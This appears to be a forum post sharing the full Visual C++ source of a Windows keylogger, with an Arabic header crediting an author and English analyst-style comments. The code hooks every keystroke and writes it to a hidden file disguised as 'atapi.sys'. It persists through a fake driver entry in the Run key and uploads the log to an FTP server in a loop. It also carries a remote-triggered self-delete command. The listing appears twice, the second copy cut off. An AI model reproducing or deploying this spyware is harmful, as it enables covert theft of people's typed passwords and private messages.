الكود خالٍ من الأخطاء عند تجربته على Visual Studio 2010 على الأقل.
طبعًا هذا الكود مكتوب بلغة VC++.
برمجة: محمد توفيق مسعّد — للاستفسار: kmkho@hotmail.com - mohammedtawfiq2013@gmail.com
kmkho.ahlamontada.com
#include <stdio.h>
#include <string>
#include <windows.h>
#include <wininet.h>
#include <winuser.h>
#include <conio.h>
#include <time.h>
#include <fstream>
#include <strsafe.h>
#include <io.h>
#include <crtdefs.h>
//#include "Thread."
using namespace std;
#pragma comment(lib,"Wininet.lib")
// Command-line template used by DeleteMe(): cmd.exe runs a single ping with a
// 3000 ms timeout (used only as a delay), discards its output, then runs Del on
// the quoted path substituted for %s.
// Analyst note: a "cmd.exe /C ping ... > Nul & Del" command line is a useful
// search string in process-creation logs.
#define SELF_REMOVE_STRING TEXT("cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del \"%s\"")
// PlaceHolder: builds "<temp dir>placehold.txt" and performs one FTP download of
// the remote file "holding.txt" to that path through WinINet, then closes both
// handles. No return value is checked, so a failed connection is silent.
// Analyst note: the host, user name and password are string literals in the
// InternetConnectA call, so they are visible as plain strings in a compiled sample.
// Observable behaviour is an outbound FTP control connection (default FTP port)
// followed by a file write in the user's temp directory.
void PlaceHolder()
{
char szDir[260];
GetTempPathA(260,szDir);
// Unbounded append onto the temp path; nothing here checks the space left in szDir.
strcat(szDir,"placehold.txt");
HINTERNET hhInternet;
HINTERNET hftpdownload;
// Direct connection (no proxy lookup) and a NULL user-agent string.
hhInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
hftpdownload = InternetConnectA(hhInternet, "www.live.com", INTERNET_DEFAULT_FTP_PORT, "kmkhol@hotmail.com", "1111", INTERNET_SERVICE_FTP, 0, 0 );
// fFailIfExists is FALSE, so an existing local placehold.txt is overwritten.
FtpGetFileA(hftpdownload, "holding.txt",szDir, FALSE,NULL,INTERNET_FLAG_TRANSFER_BINARY,NULL);
InternetCloseHandle(hftpdownload);
InternetCloseHandle(hhInternet);
}
// Reports the Caps Lock toggle state: 1 when the low-order (toggle) bit of
// GetKeyState(VK_CAPITAL) is set, otherwise 0.
int isCapsLock()
{
const int toggleBit = GetKeyState(VK_CAPITAL) & 0x0001;
return toggleBit ? 1 : 0;
}
// LowLevelKeyboardProc: WH_KEYBOARD_LL callback. On every invocation it opens
// "<temp dir>atapi.sys" in append mode, forces the file's attributes to
// SYSTEM|HIDDEN, and for key-down events writes a text label for the virtual-key
// code into that file. Every path ends by closing the file and passing the event
// on with CallNextHookEx, so keyboard input is not blocked.
// Parameters follow the Win32 LowLevelKeyboardProc contract: wParam is the
// keyboard message id, lParam points to a KBDLLHOOKSTRUCT. nCode is only
// forwarded, never inspected.
// Analyst notes:
//  - The log is named like a Windows driver file but lives in the user's temp
//    directory; a hidden+system "atapi.sys" there is a hunting lead.
//  - The file is reopened and closed for each keyboard event, which shows up as
//    a very high rate of small appends to one file.
//  - The result of fopen is not checked before the fputs calls.
LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
KBDLLHOOKSTRUCT *pKeyBoard = (KBDLLHOOKSTRUCT *)lParam;
// dwMsg is assigned here and not used again in this function.
DWORD dwMsg = 1;
char szDir[260];
GetTempPathA(260,szDir);
strcat(szDir,"atapi.sys");
FILE *file;
file = fopen(szDir, "a+");
// Re-apply SYSTEM|HIDDEN whenever the attributes are not exactly that pair.
DWORD dwAttrs = GetFileAttributesA(szDir);
if (dwAttrs!= (FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN))
SetFileAttributesA(szDir, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
switch (wParam)
{
case WM_KEYDOWN:
{
DWORD vkCode = pKeyBoard->vkCode;
// Shift held: number row and OEM punctuation keys are written as their shifted
// symbols. The mapping is a fixed table, not derived from the active layout.
// NOTE(review): several labels ("f1", "connect", "logoff", ...) are the author's
// own text and do not necessarily match the Windows name of that key code.
if (GetAsyncKeyState(VK_SHIFT))
{
switch (vkCode)
{
case 0x30:
fputs("=", file);
break;
case 0x31:
fputs("!", file);
break;
case 0x32:
fputs("\"", file);
break;
case 0x33:
fputs("#", file);
break;
case 0x34:
fputs("$", file);
break;
case 0x35:
fputs("%", file);
break;
case 0x36:
fputs("&", file);
break;
case 0x37:
fputs("/", file);
break;
case 0x71:
fputs("f1",file);
break;
break;
case 0x38:
fputs("(", file);
break;
case 0x39:
fputs(")", file);
break;
case 0xBF:
fputs("?", file);
break;
case 0xBB:
fputs("*", file);
break;
case 0xBC:
fputs(";", file);
break;
case 0xBE:
fputs(":", file);
break;
case 0xBD:
fputs("_", file);
break;
case 0xE2:
fputs(">", file);
break;
case 0x1C:
fputs("VK_CONVERT",file);
break;
case 0x56:
fputs("@", file);
break;
case 0x2A:
fputs ("PRINT",file);
break;
case 0x2E:
fputs ("delet",file);
break;
case 0xAA:
fputs("searsh",file);
break;
case 0xF2:
fputs("COPY",file);
break;
case 0xFE: fputs("clear",file);
break;
case 0x3:
fputs("connect",file);
break;
case 0x6:
fputs("logoff",file);
break;
}
}
else
{
// Shift not held: digits and unshifted punctuation.
switch (vkCode)
{
case 0x30:
fputs("0", file);
break;
case 0x31:
fputs("1", file);
break;
case 0x32:
fputs("2", file);
break;
case 0x33:
fputs("3", file);
break;
case 0x34:
fputs("4", file);
break;
case 0x35:
fputs("5", file);
break;
case 0x36:
fputs("6", file);
break;
case 0x37:
fputs("7", file);
break;
case 0x38:
fputs("8", file);
break;
case 0x39:
fputs("9", file);
break;
case 0xBF:
fputs("'", file);
break;
case 0xBB:
fputs("+", file);
break;
case 0xBC:
fputs(",", file);
break;
case 0xBE:
fputs(".", file);
break;
case 0xBD:
fputs("-", file);
break;
case 0xE2:
fputs("<", file);
break;
}
}
// Letter keys: taken when the Shift test XOR the Caps Lock flag evaluates to 0.
// Writes lowercase Latin letters, plus č/š/ž/ć/đ for the OEM keys.
if (!(GetAsyncKeyState(VK_SHIFT) ^ isCapsLock()))
{
switch (vkCode)
{
case 0x41:
fputs("a", file);
break;
case 0x42:
fputs("b", file);
break;
case 0x43:
fputs("c", file);
break;
case 0xBA:
fputs("č", file);
break;
case 0x44:
fputs("d", file);
break;
case 0x45:
fputs("e", file);
break;
case 0x46:
fputs("f", file);
break;
case 0x47:
fputs("g", file);
break;
case 0x48:
fputs("h", file);
break;
case 0x49:
fputs("i", file);
break;
case 0x4A:
fputs("j", file);
break;
case 0x4B:
fputs("k", file);
break;
case 0x4C:
fputs("l", file);
break;
case 0x4D:
fputs("m", file);
break;
case 0x4E:
fputs("n", file);
break;
case 0x4F:
fputs("o", file);
break;
case 0x50:
fputs("p", file);
break;
case 0x52:
fputs("r", file);
break;
case 0x53:
fputs("s", file);
break;
case 0xDB:
fputs("š", file);
break;
case 0x54:
fputs("t", file);
break;
case 0x55:
fputs("u", file);
break;
case 0x56:
fputs("v", file);
break;
case 0x5A:
fputs("z", file);
break;
case 0xDC:
fputs("ž", file);
break;
case 0x51:
fputs("q", file);
break;
case 0x57:
fputs("w", file);
break;
case 0x59:
fputs("y", file);
break;
case 0x58:
fputs("x", file);
break;
case 0xDE:
fputs("ć", file);
break;
case 0xDD:
fputs("đ", file);
break;
case 0x02000000:
fputs("alt",file);
break;
}
}
// The else branch is the expression statement on this line, terminated by ';'.
// The braced block that follows is therefore a separate statement and runs for
// every WM_KEYDOWN. When reading a recovered log, expect an Arabic-layout
// character for each letter key regardless of Shift/Caps Lock state.
else VK_SHIFT+KF_ALTDOWN ;
{
switch (vkCode)
{
case 0x41:
fputs("ش", file);
break;
case 0x42:
fputs("لا", file);
break;
case 0x43:
fputs("ؤ", file);
break;
case 0xBA:
fputs("}", file);
break;
case 0x44:
fputs("ي", file);
break;
case 0x45:
fputs("ث", file);
break;
case 0x46:
fputs("ب", file);
break;
case 0x47:
fputs("ل", file);
break;
case 0x48:
fputs("ا", file);
break;
case 0x49:
fputs("ه", file);
break;
case 0x4A:
fputs("ل", file);
break;
case 0x4B:
fputs("ن", file);
break;
case 0x4C:
fputs("م", file);
break;
case 0x4D:
fputs("ة", file);
break;
case 0x4E:
fputs("ى", file);
break;
case 0x4F:
fputs("خ", file);
break;
case 0x50:
fputs("ح", file);
break;
case 0x52:
fputs("ق", file);
break;
case 0x53:
fputs("س", file);
break;
case 0xDB:
fputs("ٍ", file);
break;
case 0x54:
fputs("ف", file);
break;
case 0x55:
fputs("ع", file);
break;
case 0x56:
fputs("ر", file);
break;
case 0x5A:
fputs("ئ", file);
break;
case 0xDC:
fputs("~", file);
break;
case 0x51:
fputs("َ", file);
break;
case 0x57:
fputs("ً", file);
break;
case 0x59:
fputs("إ", file);
break;
case 0x58:
fputs("ء", file);
break;
case 0xDE:
fputs("}}", file);
break;
case 0xDD:
fputs("]]", file);
break;
}
}
// Control, navigation and numeric-keypad keys, written as bracketed tokens or
// plain digits/operators. These tokens are stable strings to search for when
// triaging a suspected log file.
switch (vkCode)
{
case VK_SPACE:
fputs(" ", file);
break;
case 0x2E:
fputs("[Delete]", file);
break;
case VK_BACK:
fputs("[BackSpace]", file);
break;
case VK_RETURN:
fputs("[NewLine]\n", file);
break;
case VK_LCONTROL:
fputs("[Ctrl]", file);
break;
case VK_RCONTROL:
fputs("[Ctrl]", file);
break;
case VK_TAB:
fputs("[Tab]", file);
break;
case 0x25:
fputs("[Left Arrow]", file);
break;
case 0x26:
fputs("[Up Arrow]", file);
break;
case 0x27:
fputs("[Right Arrow]", file);
break;
case 0x28:
fputs("[Down Arrow]", file);
break;
case VK_NUMPAD0:
fputs("0", file);
break;
case VK_NUMPAD1:
fputs("1", file);
break;
case VK_NUMPAD2:
fputs("2", file);
break;
case VK_NUMPAD3:
fputs("3", file);
break;
case VK_NUMPAD4:
fputs("4", file);
break;
case VK_NUMPAD5:
fputs("5", file);
break;
case VK_NUMPAD6:
fputs("6", file);
break;
case VK_NUMPAD7:
fputs("7", file);
break;
case VK_NUMPAD8:
fputs("8", file);
break;
case VK_NUMPAD9:
fputs("9", file);
break;
case 0x6F:
fputs("/", file);
break;
case 0x6A:
fputs("*", file);
break;
case 0x6D:
fputs("-", file);
break;
case 0x6B:
fputs("+", file);
break;
case 0x6E:
fputs(",", file);
break;
}
}
// There is no break after the WM_KEYDOWN block, so control falls through into
// the WM_SYSKEYDOWN handling below and then into default.
case WM_SYSKEYDOWN:
{
DWORD vkCode = pKeyBoard->vkCode;
// Right Alt held: symbols for AltGr combinations, again from a fixed table.
if (GetAsyncKeyState(VK_RMENU))
{
switch (vkCode)
{
case 0x51:
fputs("\\", file);
break;
case 0x57:
fputs("|", file);
break;
case 0x45:
fputs("€", file);
break;
case 0xDB:
fputs("÷", file);
break;
case 0xDD:
fputs("×", file);
break;
case 0x46:
fputs("[", file);
break;
case 0x47:
fputs("]", file);
break;
case 0x4B:
fputs("ł", file);
break;
case 0x4C:
fputs("Ł", file);
break;
case 0xDE:
fputs("ß", file);
break;
case 0xDC:
fputs("¤", file);
break;
case 0x56:
fputs("@", file);
break;
case 0x42:
fputs("{", file);
break;
case 0x4E:
fputs("}", file);
break;
case 0x4D:
fputs("§", file);
break;
case 0xBC:
fputs("<", file);
break;
case 0xBE:
fputs(">", file);
break;
}
}
}
// Reached by every message (directly or by fall-through): flush and close the
// log, then hand the event to the next hook in the chain.
default:
fclose(file);
return CallNextHookEx( NULL, nCode, wParam, lParam );
}
// Not reached: every path through the switch above returns in default.
fclose(file);
return 0;
}
// KeyLogger: thread routine that installs LowLevelKeyboardProc as a
// WH_KEYBOARD_LL hook and then runs a message loop so the hook keeps being
// called. Returns 1 if the module handle cannot be obtained, otherwise 0 after
// the loop ends and the hook is removed. lpParameter is not used.
// Analyst note: the hook is registered with thread id 0, i.e. not limited to
// this program's own threads. A process with no window that installs
// WH_KEYBOARD_LL and then sits in GetMessage is the behavioural signature to
// look for in EDR telemetry.
DWORD WINAPI KeyLogger(LPVOID lpParameter)
{
HHOOK hKeyHook;
HINSTANCE hExe = GetModuleHandle(NULL);
if (hExe == NULL)
{
return 1;
}
else
{
// The returned hook handle is not checked for NULL.
hKeyHook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC)LowLevelKeyboardProc, hExe, 0);
MSG msg;
// Low-level hooks are delivered on the installing thread, which therefore has
// to keep pumping messages.
while (GetMessage(&msg, NULL, 0, 0) != 0)
{
TranslateMessage(&msg);
DispatchMessage(&msg);// dispatch the message
}
UnhookWindowsHookEx(hKeyHook);
}
return 0;
}
// StartKeyLogging: starts KeyLogger on a new thread and blocks until that
// thread ends. Returns the WaitForSingleObject result on success, or 1 when the
// thread could not be created.
// Because the wait is INFINITE and KeyLogger only returns when its message loop
// ends, the calling thread stays parked here for the life of the process.
int StartKeyLogging()
{
HANDLE hThread;
// dwThread is declared but not used; the thread id output is passed as NULL.
DWORD dwThread;
hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)KeyLogger,NULL, 0, NULL);
if (hThread)
{
return WaitForSingleObject(hThread, INFINITE);
}
else
{
return 1;
}
}
// AutoStart: writes the running executable's full path into the current user's
// Run key so the program is started at logon. No return value is checked.
// Analyst note (persistence indicator): value name "Windows Atapi x86_64 Driver"
// under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. Writing to HKCU
// needs no elevation. The data points at the executable's location on disk,
// which is the file to collect during response.
void AutoStart()
{
char Driver[MAX_PATH];
HMODULE HMod;
HKEY hKey;
HMod = GetModuleHandle(NULL);
GetModuleFileNameA(HMod, Driver, sizeof(Driver));
RegOpenKeyExA(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey);// open the Run key for writing
// The data length is passed as MAX_PATH, not the string length, so the stored
// value covers the whole buffer, including bytes after the terminating NUL.
RegSetValueExA(hKey, "Windows Atapi x86_64 Driver", 0, REG_SZ, (const unsigned char *)Driver, MAX_PATH);// set the autostart value
RegCloseKey(hKey);
}
// File: writes a start marker to "<temp dir>atapi.sys", marks that log and the
// running executable SYSTEM|HIDDEN, then loops forever: append a timestamp to
// the log, upload the log over FTP under a generated name, sleep, repeat.
// In this listing wWinMain does not call File(); it appears only in
// commented-out lines there.
// Analyst notes:
//  - "FTPSERVER", "USERNAME" and "PASSWORD" are literal placeholder strings here;
//    a deployed sample would carry real values as plain strings.
//  - FTP sends credentials and the uploaded log in clear text, so both are
//    recoverable from a packet capture.
//  - Uploaded names start with "AttackedSuccessfuly_" and end with ".txt";
//    log markers are " - Started logging on - " and ctime-formatted timestamps.
//  - No fopen or WinINet result is checked.
void File()
{
char Driver[MAX_PATH];
HMODULE HMod;
HMod = GetModuleHandle(NULL);
GetModuleFileNameA(HMod, Driver, sizeof(Driver));
char szDir[260];
GetTempPathA(260,szDir);
strcat(szDir,"atapi.sys");
FILE *file;
file = fopen(szDir,"a+");
fputs(" - Started logging on - ", file);// start-of-session marker in the log
fclose(file);
char szName[50];
DWORD dwAttrs = GetFileAttributesA(szDir);
DWORD dwAttra = GetFileAttributesA(Driver);
//
// Taken when the executable's attribute value is non-zero and the log's
// attributes are not exactly SYSTEM|HIDDEN.
if (dwAttra && dwAttrs!= (FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN))
{
SetFileAttributesA(szDir, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);// hide the log file
SetFileAttributesA(Driver, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);// hide the executable itself
}
else
;
//
while(true)
{
time_t theTime = time(0);
// NOTE(review): Time is declared here and its fields are read below, but no
// call that fills it is visible in this function. The numeric suffix of an
// uploaded file name should not be treated as a reliable timestamp.
SYSTEMTIME Time;
WORD Dan = Time.wDay;
WORD Mesec = Time.wMonth;
WORD Ura = Time.wHour;
WORD Minute = Time.wMinute;
WORD Sekunde = Time.wSecond;
file = fopen(szDir,"a+");
fputs("\n", file);
fputs(ctime(&theTime), file);
fputs("\n", file);
fclose(file);
sprintf(szName, "AttackedSuccessfuly_%d%d%d%d%d.txt", Dan, Mesec, Ura, Minute, Sekunde);
HINTERNET hInternet;
HINTERNET hFtpSession;
hInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
hFtpSession = InternetConnectA(hInternet, "FTPSERVER", INTERNET_DEFAULT_FTP_PORT, "USERNAME", "PASSWORD", INTERNET_SERVICE_FTP, 0, 0 );
// Uploads the whole log file each time, not only what was added since the last pass.
FtpPutFileA(hFtpSession,szDir, szName, FTP_TRANSFER_TYPE_BINARY, 0);
InternetCloseHandle(hFtpSession);
InternetCloseHandle(hInternet);
// Sleep takes milliseconds: about 7.2 s between passes, i.e. a new FTP login
// every few seconds, which is a noisy and easily detected network pattern.
Sleep(7200);
}
}
// DeleteMe: remote-triggered cleanup. Downloads "destroy.txt" over FTP into the
// temp directory. If that file then exists locally, it removes destroy.txt,
// placehold.txt and the atapi.sys log, marks the executable SYSTEM|HIDDEN,
// starts the SELF_REMOVE_STRING command in a hidden cmd.exe and exits the
// process with code 1. If the file is absent the function does nothing further.
// Analyst notes:
//  - "FTPSERVERX", "USERNAME" and "PASSWORD" are literal placeholder strings here.
//  - The cleanup deletes the log artefacts, so a missing %TEMP%\atapi.sys does
//    not rule out earlier activity on a host.
//  - This function contains no registry call, so the Run-key value written by
//    AutoStart is left in place.
//  - szModuleName is the only value substituted into the delete command and no
//    assignment to it is visible in this function, so do not assume the
//    executable was actually removed from disk.
void DeleteMe()
{
TCHAR szModuleName[MAX_PATH];
TCHAR szCmd[2 * MAX_PATH];
STARTUPINFO si = {0};;// zero-initialised startup info for CreateProcess
PROCESS_INFORMATION pi = {0};// receives the child's process and thread handles
char szDir2[260];
GetTempPathA(260,szDir2);// temp directory path
strcat(szDir2,"destroy.txt");// local path of the trigger file
HINTERNET hhInternet;// WinINet session handle
HINTERNET hftpdownload;// FTP connection handle
hhInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);// direct connection, no user agent
hftpdownload = InternetConnectA(hhInternet, "FTPSERVERX", INTERNET_DEFAULT_FTP_PORT, "USERNAME", "PASSWORD", INTERNET_SERVICE_FTP, 0, 0 );// FTP login
FtpGetFileA(hftpdownload, "destroy.txt",szDir2, FALSE,NULL,INTERNET_FLAG_TRANSFER_BINARY,NULL);// fetch the trigger file, overwriting any local copy
InternetCloseHandle(hftpdownload);
InternetCloseHandle(hhInternet);
char Driver[MAX_PATH];// full path of the running executable
HMODULE HMod;
HMod = GetModuleHandle(NULL);
GetModuleFileNameA(HMod, Driver, sizeof(Driver));
char szDir[260];
GetTempPathA(260,szDir);
strcat(szDir,"placehold.txt");// file written by PlaceHolder()
char szDir3[260];
GetTempPathA(260,szDir3);// temp directory path
strcat(szDir3,"atapi.sys");// keystroke log path
// _access mode 0 tests for existence only: the downloaded file is the trigger.
if( (_access( szDir2, 0 )) != -1 )
{
remove(szDir2);
remove(szDir);
SetFileAttributesA(szDir3,FILE_ATTRIBUTE_NORMAL);// clear hidden/system so the log can be removed
remove(szDir3);
SetFileAttributesA(Driver, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);// mark the executable hidden+system
StringCbPrintf(szCmd, 2 * MAX_PATH, SELF_REMOVE_STRING, szModuleName);
CreateProcess(NULL, szCmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);// run the command without a console window
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
exit(1);
}
else
;
}
// wWinMain: GUI-subsystem entry point, so no console window is shown. Runs, in
// order: PlaceHolder (FTP download), AutoStart (Run-key persistence), DeleteMe
// (remote-triggered cleanup, which may exit the process), then StartKeyLogging,
// which blocks for as long as the keyboard hook thread runs.
// None of the four parameters is used. File() is not called here; it appears
// only in the commented-out lines below.
// Analyst note: the start-up order is network access, then a registry write,
// then hook installation. That sequence is what a sandbox or EDR timeline
// should show for this sample.
int WINAPI wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PWSTR pCmdLine, int nCmdShow)
{
PlaceHolder();
AutoStart();
DeleteMe();
//handeld
//hThread1 = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)KeyLogger,NULL, 0, NULL);
//CreateThread(
//Thread FileFunction = new Thread(File);
//startThreading(Priority_Max);
//CFunction.Start();
StartKeyLogging();
}
طبعًا هذا الكود مكتوب بلغة VC++.
برمجة: محمد توفيق مسعّد — للاستفسار: kmkho@hotmail.com - mohammedtawfiq2013@gmail.com
kmkho.ahlamontada.com
#include <stdio.h>
#include <string>
#include <windows.h>
#include <wininet.h>
#include <winuser.h>
#include <conio.h>
#include <time.h>
#include <fstream>
#include <strsafe.h>
#include <io.h>
#include <crtdefs.h>
//#include "Thread."
using namespace std;
#pragma comment(lib,"Wininet.lib")
// Command-line template used by DeleteMe(): cmd.exe runs a single ping with a
// 3000 ms timeout (used only as a delay), discards its output, then runs Del on
// the quoted path substituted for %s.
// Analyst note: a "cmd.exe /C ping ... > Nul & Del" command line is a useful
// search string in process-creation logs.
#define SELF_REMOVE_STRING TEXT("cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del \"%s\"")
// PlaceHolder: builds "<temp dir>placehold.txt" and performs one FTP download of
// the remote file "holding.txt" to that path through WinINet, then closes both
// handles. No return value is checked, so a failed connection is silent.
// Analyst note: the host, user name and password are string literals in the
// InternetConnectA call, so they are visible as plain strings in a compiled sample.
// Observable behaviour is an outbound FTP control connection (default FTP port)
// followed by a file write in the user's temp directory.
void PlaceHolder()
{
char szDir[260];
GetTempPathA(260,szDir);
// Unbounded append onto the temp path; nothing here checks the space left in szDir.
strcat(szDir,"placehold.txt");
HINTERNET hhInternet;
HINTERNET hftpdownload;
// Direct connection (no proxy lookup) and a NULL user-agent string.
hhInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
hftpdownload = InternetConnectA(hhInternet, "www.live.com", INTERNET_DEFAULT_FTP_PORT, "kmkhol@hotmail.com", "1111", INTERNET_SERVICE_FTP, 0, 0 );
// fFailIfExists is FALSE, so an existing local placehold.txt is overwritten.
FtpGetFileA(hftpdownload, "holding.txt",szDir, FALSE,NULL,INTERNET_FLAG_TRANSFER_BINARY,NULL);
InternetCloseHandle(hftpdownload);
InternetCloseHandle(hhInternet);
}
// Reports the Caps Lock toggle state: 1 when the low-order (toggle) bit of
// GetKeyState(VK_CAPITAL) is set, otherwise 0.
int isCapsLock()
{
const int toggleBit = GetKeyState(VK_CAPITAL) & 0x0001;
return toggleBit ? 1 : 0;
}
// LowLevelKeyboardProc: WH_KEYBOARD_LL callback. On every invocation it opens
// "<temp dir>atapi.sys" in append mode, forces the file's attributes to
// SYSTEM|HIDDEN, and for key-down events writes a text label for the virtual-key
// code into that file. Every path ends by closing the file and passing the event
// on with CallNextHookEx, so keyboard input is not blocked.
// Parameters follow the Win32 LowLevelKeyboardProc contract: wParam is the
// keyboard message id, lParam points to a KBDLLHOOKSTRUCT. nCode is only
// forwarded, never inspected.
// Analyst notes:
//  - The log is named like a Windows driver file but lives in the user's temp
//    directory; a hidden+system "atapi.sys" there is a hunting lead.
//  - The file is reopened and closed for each keyboard event, which shows up as
//    a very high rate of small appends to one file.
//  - The result of fopen is not checked before the fputs calls.
LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
KBDLLHOOKSTRUCT *pKeyBoard = (KBDLLHOOKSTRUCT *)lParam;
// dwMsg is assigned here and not used again in this function.
DWORD dwMsg = 1;
char szDir[260];
GetTempPathA(260,szDir);
strcat(szDir,"atapi.sys");
FILE *file;
file = fopen(szDir, "a+");
// Re-apply SYSTEM|HIDDEN whenever the attributes are not exactly that pair.
DWORD dwAttrs = GetFileAttributesA(szDir);
if (dwAttrs!= (FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN))
SetFileAttributesA(szDir, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
switch (wParam)
{
case WM_KEYDOWN:
{
DWORD vkCode = pKeyBoard->vkCode;
// Shift held: number row and OEM punctuation keys are written as their shifted
// symbols. The mapping is a fixed table, not derived from the active layout.
// NOTE(review): several labels ("f1", "connect", "logoff", ...) are the author's
// own text and do not necessarily match the Windows name of that key code.
if (GetAsyncKeyState(VK_SHIFT))
{
switch (vkCode)
{
case 0x30:
fputs("=", file);
break;
case 0x31:
fputs("!", file);
break;
case 0x32:
fputs("\"", file);
break;
case 0x33:
fputs("#", file);
break;
case 0x34:
fputs("$", file);
break;
case 0x35:
fputs("%", file);
break;
case 0x36:
fputs("&", file);
break;
case 0x37:
fputs("/", file);
break;
case 0x71:
fputs("f1",file);
break;
break;
case 0x38:
fputs("(", file);
break;
case 0x39:
fputs(")", file);
break;
case 0xBF:
fputs("?", file);
break;
case 0xBB:
fputs("*", file);
break;
case 0xBC:
fputs(";", file);
break;
case 0xBE:
fputs(":", file);
break;
case 0xBD:
fputs("_", file);
break;
case 0xE2:
fputs(">", file);
break;
case 0x1C:
fputs("VK_CONVERT",file);
break;
case 0x56:
fputs("@", file);
break;
case 0x2A:
fputs ("PRINT",file);
break;
case 0x2E:
fputs ("delet",file);
break;
case 0xAA:
fputs("searsh",file);
break;
case 0xF2:
fputs("COPY",file);
break;
case 0xFE: fputs("clear",file);
break;
case 0x3:
fputs("connect",file);
break;
case 0x6:
fputs("logoff",file);
break;
}
}
else
{
// Shift not held: digits and unshifted punctuation.
switch (vkCode)
{
case 0x30:
fputs("0", file);
break;
case 0x31:
fputs("1", file);
break;
case 0x32:
fputs("2", file);
break;
case 0x33:
fputs("3", file);
break;
case 0x34:
fputs("4", file);
break;
case 0x35:
fputs("5", file);
break;
case 0x36:
fputs("6", file);
break;
case 0x37:
fputs("7", file);
break;
case 0x38:
fputs("8", file);
break;
case 0x39:
fputs("9", file);
break;
case 0xBF:
fputs("'", file);
break;
case 0xBB:
fputs("+", file);
break;
case 0xBC:
fputs(",", file);
break;
case 0xBE:
fputs(".", file);
break;
case 0xBD:
fputs("-", file);
break;
case 0xE2:
fputs("<", file);
break;
}
}
// Letter keys: taken when the Shift test XOR the Caps Lock flag evaluates to 0.
// Writes lowercase Latin letters, plus č/š/ž/ć/đ for the OEM keys.
if (!(GetAsyncKeyState(VK_SHIFT) ^ isCapsLock()))
{
switch (vkCode)
{
case 0x41:
fputs("a", file);
break;
case 0x42:
fputs("b", file);
break;
case 0x43:
fputs("c", file);
break;
case 0xBA:
fputs("č", file);
break;
case 0x44:
fputs("d", file);
break;
case 0x45:
fputs("e", file);
break;
case 0x46:
fputs("f", file);
break;
case 0x47:
fputs("g", file);
break;
case 0x48:
fputs("h", file);
break;
case 0x49:
fputs("i", file);
break;
case 0x4A:
fputs("j", file);
break;
case 0x4B:
fputs("k", file);
break;
case 0x4C:
fputs("l", file);
break;
case 0x4D:
fputs("m", file);
break;
case 0x4E:
fputs("n", file);
break;
case 0x4F:
fputs("o", file);
break;
case 0x50:
fputs("p", file);
break;
case 0x52:
fputs("r", file);
break;
case 0x53:
fputs("s", file);
break;
case 0xDB:
fputs("š", file);
break;
case 0x54:
fputs("t", file);
break;
case 0x55:
fputs("u", file);
break;
case 0x56:
fputs("v", file);
break;
case 0x5A:
fputs("z", file);
break;
case 0xDC:
fputs("ž", file);
break;
case 0x51:
fputs("q", file);
break;
case 0x57:
fputs("w", file);
break;
case 0x59:
fputs("y", file);
break;
case 0x58:
fputs("x", file);
break;
case 0xDE:
fputs("ć", file);
break;
case 0xDD:
fputs("đ", file);
break;
case 0x02000000:
fputs("alt",file);
break;
}
}
// The else branch is the expression statement on this line, terminated by ';'.
// The braced block that follows is therefore a separate statement and runs for
// every WM_KEYDOWN. When reading a recovered log, expect an Arabic-layout
// character for each letter key regardless of Shift/Caps Lock state.
else VK_SHIFT+KF_ALTDOWN ;
{
switch (vkCode)
{
case 0x41:
fputs("ش", file);
break;
case 0x42:
fputs("لا", file);
break;
case 0x43:
fputs("ؤ", file);
break;
case 0xBA:
fputs("}", file);
break;
case 0x44:
fputs("ي", file);
break;
case 0x45:
fputs("ث", file);
break;
case 0x46:
fputs("ب", file);
break;
case 0x47:
fputs("ل", file);
break;
case 0x48:
fputs("ا", file);
break;
case 0x49:
fputs("ه", file);
break;
case 0x4A:
fputs("ل", file);
break;
case 0x4B:
fputs("ن", file);
break;
case 0x4C:
fputs("م", file);
break;
case 0x4D:
fputs("ة", file);
break;
case 0x4E:
fputs("ى", file);
break;
case 0x4F:
fputs("خ", file);
break;
case 0x50:
fputs("ح", file);
break;
case 0x52:
fputs("ق", file);
break;
case 0x53:
fputs("س", file);
break;
case 0xDB:
fputs("ٍ", file);
break;
case 0x54:
fputs("ف", file);
break;
case 0x55:
fputs("ع", file);
break;
case 0x56:
fputs("ر", file);
break;
case 0x5A:
fputs("ئ", file);
break;
case 0xDC:
fputs("~", file);
break;
case 0x51:
fputs("َ", file);
break;
case 0x57:
fputs("ً", file);
break;
case 0x59:
fputs("إ", file);
break;
case 0x58:
fputs("ء", file);
break;
case 0xDE:
fputs("}}", file);
break;
case 0xDD:
fputs("]]", file);
break;
}
}
// Control, navigation and numeric-keypad keys, written as bracketed tokens or
// plain digits/operators. These tokens are stable strings to search for when
// triaging a suspected log file.
switch (vkCode)
{
case VK_SPACE:
fputs(" ", file);
break;
case 0x2E:
fputs("[Delete]", file);
break;
case VK_BACK:
fputs("[BackSpace]", file);
break;
case VK_RETURN:
fputs("[NewLine]\n", file);
break;
case VK_LCONTROL:
